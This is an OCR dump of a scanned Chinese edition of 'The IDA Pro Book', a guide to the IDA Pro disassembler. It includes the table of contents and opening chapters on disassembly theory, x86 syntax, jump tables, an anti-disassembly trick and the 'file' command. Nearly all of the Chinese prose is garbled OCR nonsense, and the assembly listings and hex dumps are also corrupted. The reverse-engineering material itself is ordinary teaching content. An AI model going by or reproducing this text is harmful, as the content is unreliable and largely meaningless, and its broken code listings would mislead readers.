IDA Pro: The Definitive Guide (2nd Edition)

Uploaded by

Wenjie Zheng
Lee eC The IDA Pro Book The Unofficial Guide to the World’s Most Popular Disassembler IDA ProfUaigri [€] ChrisEagle # coe oe se ZA@POSTS & TELECOM PRESS The IDA Pro Book ‘The Unofficial Guide tothe World's MostPopular Disasemble IDA ProbQaiiPl orem) IDA Pro RGR. EI (2ERKTRESUM) ROAM EOOARTATA, FTAA EEO, eee —aI IDA Prov Hiliakit thi Rice a, SESAOERH Tk —Abteh, Chris Eagle Mie RA ARMS Ate, TIRANA A IDA REM — AR FRURTMASEOLROBAG AMIDA Pro RORAM, HAREM, RSNA YERIDA Promyaaie A, BBG, SRORARERSAMOLGAA, HLARAB, MBG LRA EBB EIIDA Prom AK, Chris Eagle LAMA HEL NRE URE RH AMAL RRM. iit TRSIDAMH, BSA SRT Gray Hat Hacking—%, (hi@itiZBalckhat, Detcon, Toorcon#ShmooconS RSRLARLARG RF, B IDA PoA# RE RSE 8 ZAIDA Pola Lime 8 HOLE IOMEFTH cg ood coc IM Eft 89.0076 R—HMSt IDA fst HR RLM Ll BIC 1.2 fA 13 Aufl ~ 13.1 Aap Be 13.2 mma 13.3 AREAL 13.4 Rowe 13.5 Sai 14 Sfp ICE 141 RAM RICE 14.2 Sibdade RICH 14.3 a FRAC 1s Ne #2 Pea5seiclHA- 21 SPRL A 241 file 212 PE Tools. 2.13 PEMD. 22 HRT 2.2.1 nn 222 Idd-~ 2.2.3 objdunp- 2.24 oto! sm ety 2.2.8 dumpoin 22.6 cefilt 23° RACMOTIR Bs 23.1. strings 232 BiB 24 Ne 3H IDAPro RMR 3.1 Hex-Rays 2°79 52 RERIRRE 3.2, GOR IDA Pri 3.2.1 IDA MA. “ 3.22 IDA#WTiE-- 3.4.1 Windows #40 342 OSX # Linux #4 3.43 IDA 4 SELinux 3.44 3243 IDA 6442 IDA 3.45 IDA BRE EH - 3.5 IDA RIP RB- 3.6 MR IDA BARK RoBD 4% IAA Al 3h IDA- ALL IDA Sf aoa on 412 RA SHOILH MRE - 4.2 IDA SHER 42.1 408 IDA se 422 XH IDA SIE 423 Ce ARE 2 ak 43° IDA STIPE SP 42 632 =3bAlaek 44 WISH Bo AC TTAT I~ od 64 Nt 4.5 IDA RMSRAES - , 46 Bitten 7 RCIA NR ME 47 MMB TA BAGH TAL Ale REE. BSR IDARERBO soe 7 TAQ QAR 5.1 IDA SEMEL O 47 113 FARA. 2 S11 GCA Re 7.2 IDA IARER. 2 $12 haw 721 BALE, 3 513 wee 12.2 TEM 84 5.2 UCR IDA Baan 7.2.3 ALi, AA e Ae RAE. 84 5.2.1 titel 124 Baka. - 84 522 73 BAR AER 5.23 131 RAR RRA 5 5.24 73.2 SCANS HER 87 5.2.5 73.3 MURA, : 88 33 $b ipa Bae 13.4 Bibs REAR. 
93 5.3.1 Strings 7 14 BARU 98 53.2 Names #2 TAL RRA 94 $3.3 Kae 142 RRP ARE “95, 334 £250 743 fet atia : ” 53.5 ABEHO 9 TS ANB ose z ange 9 ee ee fo OR RURAL S REA 100 a en 8.1 VRS HE RE BL MeL AS 6e RRM 62 812 AHARIA 107 6.1 ABA IDA SAE ~ 62 8.2 Bist IDA aH AZ 6.11 ab Hi 62 82.1 ASE 6.1.2 Wea SAL 64 (BRE) » 12 613 PAR RIG 64 8.2.2 RAEI ROE “13 6.2 Eb 65 8.2.3, FABLE ELBE AYA nee 11S 621 ABR 66 uns 62.2 Beem Ey 69 “118 62.3 RAE ; 841 ii CHAE R J 18 6.2.4 IDA RBH 84.2 MAC ALA 63 WREEIE 8.5 GHATSRMRSE Ht... 63.1 SAAR 8.6 IDA TIL Xft 8.6.1 deahardy TIL tH 8.6.2 RE TIL 8.7 CHB LARAEA 87.1 this 484t 87.2 Bidet 873 TRL m ae 8.74 ZAR ~ 8.75 SEAR RBA 130 8.7.6 BAKA one 8.7.7 CH ®TBRH RAR 88 JN a HOS RRA SRHH- 91 BERGA mn O11 RGR RIM 9.1.2 BRR 913 RRMA - “123 92 IDASE 9.2.1 IDA SK (BS 3) ae 92.2 IDA MRR BRA — 147 93 Ae S10% DANSAHAFL 10.1 #88) BSE IDA O11 42) SAM LL 10.1.2, Windows #41 & 51 10.1.3 Linux A 52 10.14 OSX Rae 54 10.2 FH IDA fofit Rast 10.3 Nei REBD IDA BARA 11 ERI IDA 11 RBS V1.1 EMEA: idacty- 112 GUIRCEXF: idagui.cty: 1113 @OlGaCR RA: idatuicty. 11.2 Sif IDA Reet DT 11.2.1 DAME. 11.2.2 £4) IDA LRU. 165 13 NEF oo “167 B12% (EA FLIRT SARE 12.1 EUR A ERR. 12.2 EFA FLIRT 4% -~ 12.3 QURE FLIRT 4% XE 12.3.1 18H & REE - 123.2 RRR EA 123.3 ORAL nes 123.4 ORES 1235 Babes 124 hee S13 AR IDA BYBTIR wr ernenenee 9) 131 13.1.1 IDSs. 13.1.2 tat IDS L4H 132 2A Tonio EEE 13.3 Ai ~ 4k BANE PE EE IDA BRE 186 +186 187 187 14.1 14.2 IDA LF ST 8 14.2.1 IDA 2 aly MAP Xft- 14.2.2 IDA 2a ASM Xft- 14.2.3 IDA 2.a4 INC 34 14.2.4 IDA 249 LST SH 14.2.5 IDA 2&8 EXE X# - 14.2.6 IDA 2&4) DIF X44: 14.2.7 IDA 2&8 HTML &4-- 143 ¢hig:-—~. aS #15 Ws IDABA- DTA HRN ATR - IDC if 15.1 15.2 153 15.4 15.5 15.6 15.7 a xX MS RIDA AUTRE 15.2.1 15.2.2 15.2.3 15.2.4 15.2.5 15.2.6 15.2.7 15.2.8 RR IDC BASS at 7A FAay IDC aK 15.4.1 15.4.2 15.43 15.4.4 15.4.5 15.4.6 15.4.7 15.4.8 15.4.9 15.410 SIA AR dt. 
154.11 IDC BARA 15.5.1 15.5.2 15.5.3 15.5.4 15.5.5 15.5.6 IDAPython IDAPython BRAN 15.7.1 15.7.2 15.7.3 me ks IC ARK ~ wes IDC at IDC FR IDC IDC ABR AE. IDC RASS AE Brean ak APRA ae FER RMD SPER AH aE Bi Bo PRM HG 2H RID Bo Hk th Batt RAB RLM ast PRK A AM Bett HE ARM Bi Bk Bic tare BBA BRA orn BARRA Mo Ha tho dt RA AoA Ht Ha PICA EA cers BRED “ BARA 15.7.4 eee, 18.8 AN #16 & 16. IDA RAF RTA SDK fai SP leL1 &# SDK 16.1.2 SDK #548 By 0-00 16.13 mee Ms SR IDA REC 16.2.1 RARE 16.2.2 ASR 16.2.3 AA SDK MR 16.2.4 At SDK Hat. 16.2.5 IDA APIR RAS 16.3 AE ne E17 IDA ERS 1721 SSEEE VA AR 17.1.2 dithan dete, 17.1.3 $i 4... VA ai ARAT twats - Hite. SARE - aR e- DAR 17.6.1 #9 SDK # “BR” op FFE . 420 SDK 4138 9 TL AH 42. F Windows #4 MP BERR 17.6.4 #2 Qt ta Pe 117 BERRI 17.8 18 SEBS HES IDA SLA -. 18.1 RATS 18.2 Fai mge— 4S Windows PE SCH : 18.3. IDA Wa BeBEI 16.2 17.2 173 174 175 176 17.6.2 17.6.3 18.4 {FE SDK 8% IDA MaRH -. 18.4.1 “MR” tos 18.4.2 RE IDA BOR BARR ooo 288 18.4.3 IDA peap 22 B ower 288 18s Soha fnae AER 294 13.6 Si BOA CE 294 18.7 ANS 19% IDA Shea 19.1 Python 4585. 19.2 Python AER. 19.3 (EHH SDK #85 baa BESR 193.1 processor_t #4 tk. 193.2 1933 1934 19.3.5 19.3.6 KBB te 19.3.7 Zee processor t aH 19.4 FyRRAL REEL “ 19.5 Sem BEA sham 19.6 REBAR BER AE Hit 19.7 SALA BEE 19.8 Ae ~ MESS RRA BOE Resa 20.1 BRERA Ab SIH 20.2 RITITH---- 20.3 REL main RR 20.4 BRR RAT AE 20.5 See 20.6 Ae B21 MMT. QL RASHES 21 ARE AH 211.2 SHIR debe. AR 5 2113 FAS aM... QL BA Rp ask EPA LI 356 21.2 RanSSPTET; 212.1 Hem diate, 2122 ARM oR” 21.2.3 HmLAIR ES -. 21.24 BIbIiK 21.3 £7 IDA x mae “WAS 2B” 213.1 ie ta 21.3.2 caer tay 2 eM 366 21.4 RF RSLABO “375, 2S Av “ 377 B28 RAS... 22.1 GUA IDA SRSA Ta TA. 22.2 (AIDA HG RR 22.3 IDA SAP REFE iL. 22.3.1 ia A 2232 BARBER on 223.3 BPR MB aew 24 22.5 23% AIDA Hat 23.1, Hex-Rays 23.2 IDAPython-- 23.3 collabREate- 23.4 ida-x86emu 23.5. 
Class Informer.~ 23.6 MyNav 23.7 IdaPat 23.8 Ne ABD IDA % 24% IDAWKR 24.1 BWR 24.2 tke aA 24.3 UERAE 24.5 25H RCRA RR 25.1 25.2 28.3 23.4 PAR RMES 8 aie 24.4.1 BARBARA BAA coe 24.4.2 ARIA IDA MH EMR a Aah 424 428 Mi “431 PRA IDA. ‘eae IDA manta. ORO. 253.1 Bab BAE 25.3.2 A MS fo RRR 25.3.3 FART 25.3.4 AAS DAStealth 25.5 25.6 B26R Rei HAe- 26.1 26.2 263 26.4 HRA HERB RAR Asti AHF IDA UATE RL 26.1.1 Al Hex Roys BiRBIE 26.1.2 sbAR S| BARIRAT 26.1.3 ALIERIM IA ae 2614 SERNRET RM feat ‘MCF Bochs HEFT Bat 26.2.1 Bochs IDB #&X 26.2.2. Bochs PE #A, -- 2623 Bochs HL ALSRIX Areal . ANB EAA IDA KIRA 5.0 IDCISDK 38.231 Fh eon Ri Bases 2H MASALA 3% IDA Pro RMA iL gates BART IDA Pro 5, PARTS BSA. UE, A LL IDA 2y'Pil, HAR IE ANAS BEA HEIL LE W IDA Pro FAFA. HR, ATE AOHE IDA PARAL MLR, RRR, TA (Re REE SRAEE) Bt, BSORAR AS ATA. 7EiE EOIN, BORHILOEE EAE IDA PYRE GR RTEMDE SEAT SFA MES AR ROE. Alte, ERHERIREE ST IDA BIDHTE, AFAR PSC BT EAES , RUSTE IDA AYRE IIE (RAIA BEAR HEBD HVE). RAEI IDA MTA DIRE. HL, AER, TEMA TREAT, AS SPARC SURE ICA FA, XLRI IDA ROT AAPA RA FEMI IDA ZA, THERESE RIANA, DBASE ae ET CRA A, SAE. BR LE Rin IDA 2TH. (EAA IDA HY ARNE, ABA TRA] TA IDA HYET AE. ARREARS E BINA RL aS 1.1 RCI FEES PA A AMBRE, SPARE LAR, FB DRA Oa Hi Fo OF—-KBE. KE RAEI, —tH Of 1 ER Sees Cin +E ) A. RABAT HEIE TT. PRGA ARATE, TERE HEMRATK, ARES RABI. BARKS ES, At DA 5 A, ULAR TIE AS BH — 2 4] TA OS=KEE. HIKARU IcRBS, CRAY MRA AORARAA. 16, TAS FUA, SBR TICS AEA (Msrieat ) ME. AMR, RABI TRE RICES CARES. Lm BRE FE FA ORAL iS PR BAT UL ASS O MERBA. RAASLA TRS (CER), Hae GUITARRA. WS, POUR MRETHEME A. HE, HTB aS WFO TE FREER, CNEAA DFG ROE. BLOBS 13) AMAT 3 ‘Flim FORTRAN, COBOL, C Al Java. S07 Aid i AE BE Ee SURILRIE RARER RAE S (RAAB MONE, IEW). OSDKBA. RATERTE, ASABAK, AMMA BHT. 1.2 WARIS TEAST SOY, BEE BU ERR CoRR ABER AR — PL RET AT BAY. AT BRE (SUPE UE TM LE), RS AAR AR RAPE, BOLT ARI SALES, 2H. 
SOC, Atk, Be AVATAR SCRE SIERO AR CLARET EAA a CA BERE IU LAT SRS BE ERE, MA ARA, RNR NBT PERPHA ORATOR. A, TEM E FF BSE FT ERE YA SE — MI EE HR, PPE EF DAL, WB AT IH O METAS ARK. Ma TARR , ERE (TE AERA TASER AS EE ) ata, BBI—7 32 HARARE REE. IRL BT. ARE MARERS P32 TRAE AEA BBE AS 32 LUPE 32 (SRT OMERF SH SIRE. RRA LORS A RL Ri, TTL SAT A LES A ORE. Alte, RE, RPE, REFS BI SAARI TNA RE. O Rom S TB Pm. FEST TARA C RAE AE rh Delphi HE8E ARIS SREADUT, THREE AEM. TIRE, HIXt Windows 4882 APL —JEit SAEED EP READ a PES) Windows —HERISCHR, (BAN AE BIEL ATA HIME. OFSEMARRE—TIOMM RE, BLP RAVRIL MRD. LPIA, LiL Spay Be (Ta SB EAC 38 23 BE AMA ST EIS HIN PERE Hex-Rays, 1.3 ARIF FES, CTT AE TPE OR PEER 7 PRE RETT BAT Sea We SUBOLELIEL PILAS OFT R ER. PAT a. O SPATE HERE 0 STREETS, LURES PRR PERE ALA OEE. O EEL RS PESTA LB — 4 RAE RC AT 1.3.1 Sr SH, THAT eT “HER” EARS, BRE te A — a TB SiR, PRR, SET RS TL. IRAE AA, ARTA ASSES ATE EAT EBB AR. 3h AH ( dynamic analysis ) AH AEP MRS Hl IEE fe) PETRA, IFO ARGO SAT RCRA TY. HL, HS 74 ( static analysis ) UA EL CF AT 0 HE, BRE ET IZ BINARY. 1.3.2 dat Fy FLL, BATHE TES PEST 3 ERR: ALI. STU. FP ESF (exploit), KLAEAHAGKE, PIURARESRRUTRSAK, (Ee, MRA SR, TRB BAB. REA —TER, BR BBE PERT BAL FERRE. ALT, RATED EL SRN has ABI — AM, aL eT EB HERE EEA ). — ARS ATR AIT. Date On WALES A, MURATA, Cet Ata PAB ET MERI MMT DAT ER, LBS EET PBST. BN, EAA +t 70 FSA, TERESA, SP AB) 80°F, MK — ARRAS Wh, SET FRESE PR OVA) RY FS CLE BCP SN TA EET HEE, PE IL EAU. HET SURE, TS ees RAE, BUS, we (EFA IS aS ARES. ALOT DATE Ae ee 1.3.3 RABI SMSRALVA MEAN Be, REFS RAR EAT LAS EOE, BR RHE ABA ESE RE EERO OF Sa SA TS, BLE A AF. WR) RRS, SEAT, TRACT 6 LAE, BBA TOF RARER REE , ORR RTE RIT LR. EF. BRST SUP EME-ASENBOTE MEAS, OT RRA, UST T REN BUENOS 1.3.4 SPR ME HT aE SE (BUICSERE ) AFAR LER, RE A I A EE BERL AEA BHU STA BLK AT AP PRR ACE A TL BSL, ROR, EY AREA TED AS BOE, WPA LEE RRS ATT, EE. D BRANT — RTCA, ERT AA LAA, RE NA Se cea ATH. 
Se, MCAT CAO 14 dott Ricth 5 13.5 Sriitias FERRE at ER, ESE eR A. BA, TR AAD SRT ES A. EAE AEM RI, TEAC MOAR, CAT RSH, BACAR. A, FEVER, Oy TRAIT, BPR RS EN RAL A 1.4 Sn iC BME, PO BAI ST RICAN, PIR AMTRICH. LAGI ete eT — RE ESAR: HT—* LOOKB HLH, HRP PH RBH MH, ARORA ESL BAY, MRAP, REMMI R, EAMES, RMT AMM SRE, MUSE ALGAE ELI, PUREE ae RB E AR, ESS IT BOL EAS PP REE ATER, ICR ELA KR LB AE, ALERT A LTA PIT FS 9 BE Be SCT BO, ET: LAY BI i BS FER, RATES MARL AG RAT A EAR. TEST A BS) Wy, POAT EAT RR, PA SEP RE RIC a RRA TEA TOS. Tee A a a JE, BEATE FF BRR IL ae ART 1.4.1 RAM RIB WBEDER, AIF RSPAS A. LOSE NAR A OR BCT PRT RAMRILRLE TOR, BRAT AR. OFS, REUTRICAMORBER, RHARARBAMM. BM, HOSEA Ati, RPE BR. DR LY —§ BI $a, PRS BRE Fo BT RAT IC EO SA A SK. Windows ATE FAY TS HiT DAT (Portable Executable, PE) MX BRIE S Unix RCH AAI T 45 Ae ARH X ( Executable and linking format, ELF ). x88 7i FOU, FDR RISE Pa SUA A CLR (GH PRL RR TER) O B=s. AUER S MIL, FRR (SOC) Sree, JAMIA, HUA SEIS a BICR, BUR IL SANTEE ASS ARE, URE RES a, AT SELMA SORE EAL AT REE DAAR 45 HATE BASE AG Sr Fs PREM. RE PHES AE I ERS R, ‘MN Intel x86, BERRA, RRR RBUNE STS. ORES. RAUF TE ESN, REM ERR A SPH TS, DAG AIRS Mii, — SLR LIE, HR EUR LRU RS 6 RAE RICA 16, FFE SUR. ASL RT OEE, PN, x86 ICME PEATE APE BARS Intel HERA AT&T Mak O Os. i —AHOR, RICE AS, HEM be, RICE TEAS. MOO ICMIESR: ATAT A Intel 5 METH LLAM MAIER: ATAT Hie Intel 1. AE ONMAT RR BF, ORAAMERERE. BE. FABTA. RBOALTS, MRP PABEED DMAAE AM ZH. ATRT ILMB ANA TA BBA MR, ASEALT RE (4 YAS PPAR aR) OOM, CURA RT REMD: RSET A, BTA. 42M ATRT BR, BAX PABA 4 4A: add §0x4,2eax. GNU ICM (Gas) AoI+ FH AY GNU FL (de geo # gdb) AMAIA AT&T 67. Intel #24 ATRTBEAA, CXELFASPAFMM, EH MAAAAS ATRT FEA RIEAL: HORM T Ak, AMT AW. RA Intel oe, beak #484: add ean. 0x4. 48 Intel sik M4 iC oe 3 O.46 $4 JCM $ (MASM ), Borland 4 Turbo iC.th 8 (TASM) 4 Netwide i 4% (NASM). A BPI PT HF BE MATERA BI a, Ova FARA SE, OR A ete, VL Be MRTG FE AAT 7e WOR Hi — RES RAS. 
NEATH (linear sweep ) FAK I3 F BE (recursive descent ) SPUR ER RI eI» 14.2 Se RICE RAS IT Sia PATRI AE BD A DF BE AG BEI TL HS HA; — AR KR ROTA. Al, BEARER, HMRI, BREE HATO CH ESL AES ) Me SR LES. BULA — BEI I, HERS MUR, BRACES, HOBIE MUGER. BO AIEFE A SLI) PAE EA OR TAPPER SH TE BET LISA, PLLA oR MITE TE IL Sa A A. ES "P,P AHR, EAD BUE TAGE RIL RE Hate, RE AEE MISH RTESHE (aU MIPS ) LET RICA SEN , RTT ee Fates. SUSIE BEEN, TEP CRB 8 OO ET A SEL. RST AE BARR, AE Ba 9B SSE FT ET. U1 RT RR, ED BEE LIAS Sh — PRTG SA A RAP switch HY, ROBE JHE EPR AOR BUT switch 1), TEL, Sa aRvePE Ce BGM SEH A — NB 14 eR 7 Ho 401250 (@) ADM) jmp HATS PU 401287 (@ ) ARMA AhI ke. (ELL, BRI | HE (@) (dy — Sie DOMES, SPORE TIERONE ISL, FR 1-1 EH Ie ao123#: 55 push ebp 401240: 8b ec mov ebp,esp 401282: 33 CO xor —€9x, eax 401244: 8b 55 08 mov edx,DWORD PTR [ebp+8) 401287; 83 fa 0c cmp edx,oxc 4o124ai of 87 90 00 00 00 Ja oxqo1ze0 © 401250: FF 24 95 57 12 40.00 jmp DNORD PTR [edx*4+0x401257] © 401257: e012 Loopne 0x40126b 401259: 40 inc eax 40125a: 00 &b 12 40 00 90 add BYTE PTR [ebx-ox6Fffbfee],c1 401260: 12 40 00 adc al, BYTE PTR [eax] 401263: 95 xchg — ebp,eax 401264: 12 40 00 adc’ al, BYTE PTR [eax] 401267: 9a 12 4000 a2 12 40 call_0x4012:0xa2004012 40126e: 00 ga 12 40 00 b2 add BYTE PTR [edx-oxadffbfee] ,ch 401274: 12-40 00 adc al, 8YTE PTR [eax] 401277: ba 12 40 00 c2 mov edx,0xc2004012 4o127c: 12-40 00 adc al,8YTE PTR [eax] 4o127F: ca 12 40 Inet oxg012 401282: 00 42 add di,di 401284: 12 40 00 ade al, BYTE PTR feax] 401287: da 12 ficom WORD PTR [edx] 401289: 40 inc eax 40128a: 00 8b 45 Oc eb 50 add BYTE PTR [ebxeoxSoeb0c45],c1 401290: 8b 45 10 mov eax, NORD PTR [ebps16] 401293: eb db jmp _0x4012e0 ARLHS (@ ) DFR RR AOIESE 4 SAL HE ame (little endian) RAT, BATH, SME ALARA — Ts LSB UTES. SER, Rei h ePaeBee EN By ebE (0040120. 0040128b, 00401290...) PAI—t. 
PAilk, (@ ) Abt loopne HIFAE AHH; HR, ERK ER HEI AACA TEA SATE GNU REE ( gdb ), BCAA) WinDbg JHECREAT ob jdump 3 FLA A BEL 285 | BIR, PELE. 1.4.3 jG TRE IC SS IT FER Ih — AEE 5 UTD RETR EER 3 BEL TARE HRS R ERA ASSERT RIC, FAT BE, BATHE ARSE CPU HES HR ETH UT EIS, D A CRU MAE hae LN RRA ACE NS, MUS CPU WHR Cbigrendian) CPU; S5E% CPU HILAF ERUEADRCEN , URI H (lttle-endial ) CPU, 8 1S Ric mA 1 NRE SUF TAR SHE DUTT RLS BIL 8 FZ, MURR ROI UI AE, Madd; APRS AVEZ IMAM, Ha mov; ARRAS. tn push AM pop. BAGH DRI EEIT. SLBA TAT. 2. RAKES FESPA (40 x86 nz) HELTAH READ RAEE. MURRIETA, FRE DANEEL, POLED EM A tk. (HAL, MURR PE ITE, MUMBA THES FREI RIL — StS. ANAT REAR Pm RRR SR, BUTE PES ICM LR BE AREAS. WANT, CESS ERAS OH SU 8) AAS A EAT I UN Mo FZ, NTRS BES IC 3. RADE AAA A ARR HEROR,, C, CB ESRDUARL E, STP SF, DTU SINS, (LIRA ON RASH OST, BL, At WELK, BARARRAE READS OR ie, u,b AT. RATS aE SARI PS OR RE GR HEY ER OE a BE YH Fo RRA, EMEA Ae APSE AT fe So UF I AE RU. ABE HE FMT, BONERS ARAL EDES Hb. x86 OY Jmp eax HO RLIERT Hi) . VARUP ASAT, cox MPT LOAM, hi PRR AREER PLATA, FUERA BRE SY AR, WRLC URE MT Aa ke I 4, BRS BRR SANS TT HR SAAR OAR RABI, (ALERT call eax SFR SHAPE), HEART, — ELST, DAT ECHR IELY RAREST. HER Tiki, CASAS ROAM, EVE TAGS. ULE BR BOR SI HE SSA TILA AAG ALIN BOT", TSR DF es EAE LL AOL PAR HE SEAT IT, SCT FPRHGE EIS. UUIREFP RATT BLE, RUS MEBRATAT ARAN PALA, meh 9 RAY he os ET CHE She, IR, ERMC, SOR) IRIS TEUAIRU ALL. FOTOS BRE — TOT. CEM, Bee foo TERE IVA Bi, SARUM T 1. Foo proc near FF 04 24 inc dword ptr [esp] ; increments saved return addr ES FT FF FF FF call foo 05 89 45 F890 @add eax, 90F8458gh 14 det Re 9 SR, TEVYH foo Zit, HEMT LIANE EI (O ) Sih add HS. TAM RICA MOF SAR. 0 proc near FE on 24 inc dword ptr [esp] GB retn foo endp ES FT FF FF FF call foo 05 4b 5 ;formerly the first byte of the add instruction 89 45 FB @nov — [ebp-8], eax 90 nop CLEARER AR TFSI. SRL, PRL foo RAUB ELAT th Fe sbey mov #82. (AAT RRA, SUES 2 Ia ah A] Reh eRe TE BSI, FA RAAT. 5. 
BEES Fat, BATA T AE. TA, BYGRPHES (hn x86 ret) BART SORBET INTE S Mia. DT, SUP RSCIEAES TT, MAT LU RR BS — Mi, FEA HOLL TT RRL DATES. (HUE, ROMER AL AVR. A RI aT RS PR Ae BC, ATF ELIT St 8 ee HE — EIS ATS SA AS SRA NAE A aE, ER RE 2 CEPR RUA RL TE SE WH. AUT PERAK — TERRACE, CAA RHO SEE RAE. HEE TH NIE, CRD ae RIL aE HE a GRO, BE RIE EE F, BARRA Re, WE RR STORET BP A IA. PRT, LER SOFA P RS CS ROAR SEIN) AL (heuristics ) CATH, BAVA EBL IL a as REET ATU, FATE AUS SR. PUTED 1-2 FARTHER A 1-1 PAY switch ADA BR RETAIN AR AAAS 1-2 FRR (0040123F push ebp 00401240 mov ebp, esp 00401242 xor eax, eax 00401244 mov edx, [ebptarg_ 0] (00401247 cmp edx, Och 5 switch 13 cases 00401244 ja loc_4012E0 5 default 00401264 5 jumptable 00401250 case 0 00401250 jmp ds:oFf 402257[edx*4] ; switch jump 0401250 ; ~~ - (00401257 of#_40125; 00401257 dd offset loc 401260 ; DATA XREF: sub_40123Fe11r lo AE RIC AY 00401257 dd offset loc_s0128B; jump table for switch statenent 00401257 dd offset loc_401290 00401257 dd of fset loc_401295 00403257 dd of fset loc 40129 00401257 dd offset 1oc_4012A2 00401257 00401257 (00401257 dd offset loc 401284 00402257 dd offset loc 4012¢2 (00401257 dd offset loc_4012CA 00401257 dd offset loc_401202 00901257 00901288 ; - 00401288, (00401288 1oc_401288: 5 CODE XREF: sub_40123F+12j 00401288 5 DATA XREF: sub_40123F:off_4012570 00901288 mov eax, [ebprarg_a] 5 jumptable 00401250 case 1 (0040128 jmp short Loc 4012E0 ; default 0040228E 3 junptable 00401250 case 0 TER, BR BRE BURHIHR, FUE TABLAS SEL... IDA Pro FRR SU AS FRESE. TBI Fe Bh FRA IDA FoR ETRE RIE, A Beta FM EBLE IDA HER 15 MB ARIAL ARM, ABER A TRI RTA? BASE, TE eA aa sb? aR) EDT BI LAT, MF LR EKER, ARAMA, HZ: SIBEA BIAS, Ey AREA OL ORES BEE ASE BRE AOE RE ET 1, kA T HEAR. EPH, RIMTH RIDES N HA LBA FOMMRALA, BRENIS DA WHHRKR, RSL AMY WA ME MN, MACABRE IDA LB RMARHAR. Bea SRiLwLAR ICR HA RAVUR, TRAE IDA Pro ZAt, SAS Ew BoM NLA, SRE TAT. RAT AAS WA 2H, Ft ERE FP BG SMT UE CPE, LUI WIFE IDA ROSTER. 
MURIEL, IDA Heke TL FURS TIRE ABI AR PUR ET, 62k) RET MRR, BU, RAE IDA SE SPRAINS, APE ILRATI RAO TER, ANSE 24 ~HS 26 ATT Ee 21 PBIA JH, FEVERS, AU Ae ATE, hn BRM PAR fF", RT ROU, BRR Re ECR. BRR HY FEM FEBRF RET “SCOT RA FETT” ENSUE, ARITA AAR ELAS ALR. 2.1.1 file Tile tro — ERIS T AL, KAPCNIX HUE EUSPER SEAL Windows Fy Cygwin?at MinGw? SLAB PATI TSE IATA fi Ve Be PL RE CFE BOR HE AUBY, Pile REABULRL A LISA, ne! /bin/sh ( shell BAAS SCH) ai CHTML 3ce4 ). 48 22, WAM Adk ASCH MAM UTRARAS, CAMA, file SBA HMI ERAT ORME MI CEN, BRL, ERE CES STA RL GE PRAZTEO ) TF TRARY ANE ARIAL eh TIL A PE I © 4551. np: swe cygwin com/, ® #8. mupstonww.mingw.or/. @ sr AREAS RICA EOR VARI, TASCA AMALIE. AU, AASB AT IRIOUR, Gin, MS-DOS HT IFT HB M2 AREAL MS-DOS IRRHII Mark Zbikowaki 8A WS PF EATS. ARTI, Java ff lass APE T AER Oxcotenate, HAREM NCI, (LEB ER NAB CtZ AHERN AM, 12 #2% BHSRCHOR Windows PE executable file (00000000 4D SA.90 00 03 00 00 00 04 00 00 00 (90000010 88 00 00 00 00 00 00.90 40 00 00 00 Jpeg inage File (00000000 FF D8 FF FO 00 10 4A 46 49 46 00 o1 {90000010 00 60 00 00 FF DB C0 43 00 OA 07 07 Java .class file (90000000 CA FE BA BE 00 00 00 32 00 98 OA 00 2E 00 3E 08 00000010 00 3F 09 00 40 00 41 08 00 42 OA CO 43 00 44 OA File HESPUUHAC READ ICPHESR, ALTER ASCII SOIC ARPT IAT ICAP ARAB SICHE. File DTT HH 30 CAF ( magic file ) SLA ASL 6 ROCHE EER SET SH, WLW AUER fusr/share/file/magic, /ust/share/misc/magic Wileto/magic, KT BAA XI SOUHHER., WSR fe MCE. Cygwin & Windows +f #6? H—#1 FMA LH, THAR Linux HUGH) 4 shell F748 KAZ A. BRRMEY, AABRROTHUM Pik, GMB (te gee. gt+). MARE (to Perl. Python. Ruby), P& ATH (dene, ssh) F. KRM Cygwins, +H A Linux HH ALATA Windows Aa MIA ATT. FERAL T , file LAR RSIR HRE N PME . 
UEREERT file ® ALABAB EU JLAAR TRAY ELF SEIS, WLS HR EET Ae al OC ar Ck AS ) DRIER TAPS AB ‘idabook# file ch2_ex_* cha ex.exe: MS-DOS executable PE for MS Windows (console) Intel 80386 32-bit ccha_ex_upx.exe: MS-DOS executable PE for MS Windows (console) Intel 80386 32-bit, UPX compressed cha_ex_freebsd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), for FreeBSD 5.4, dynamically Linked (uses shared Libs), FreeBSD-style, not stripped cha_ex_freebsd_static: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), for FreeBSD 5.4, statically linked, FreeBSD-style, not stripped cha_ex freebsd_static_strip: ELF 32-bit LSB executable, Intel 80386, version 1 (Free8Sb), for FreeBSD 5.4, statically linked, FreeBSD-style, stripped cha_ex Linux: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.9, dynamically Linked (uses shared libs), not stripped 21 FREE 13 ch2_ex linux static: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV); for GNU/Linux 2.6.9, statically linked, not stripped cha_ex linux static_strip: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.9, statically linked, stripped chz_ex Linux stripped: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.9, dynamically linked (uses shared libs), stripped Sie “PRORMLAM ES” RRAHRMLHEPMRAS. RHR R ARH Ol AAP GFE S. ARRAY THAT ASAT AL, SEP AEF A MRR AE MAT HAMMAR, HOME, ASA TRES HRA AREA AN HEE. MR RRS, HEPAT. AMM, HEME HLATHHRRS MERLE. seth, —AGA strip HALAL T AT MARA RMT HEF. BRERA BH BARA EAR IMES SRR, ABARAT G AS SH Gh REAR ARE ER file RASA ASS we. RATS LT RHR, file FL FARA BES REO EE. ORT LB — SE EE AE PEPER 4 EBOH Java WXDROPSI CA FE BA BE, HUES: —F L2RWUL. LIM, file ait harieacny SPARED CRF 64 Java RRA. ARE, MELE M2 RIPE CA SCH RU Dyik—P MS-DOS THAT A. 
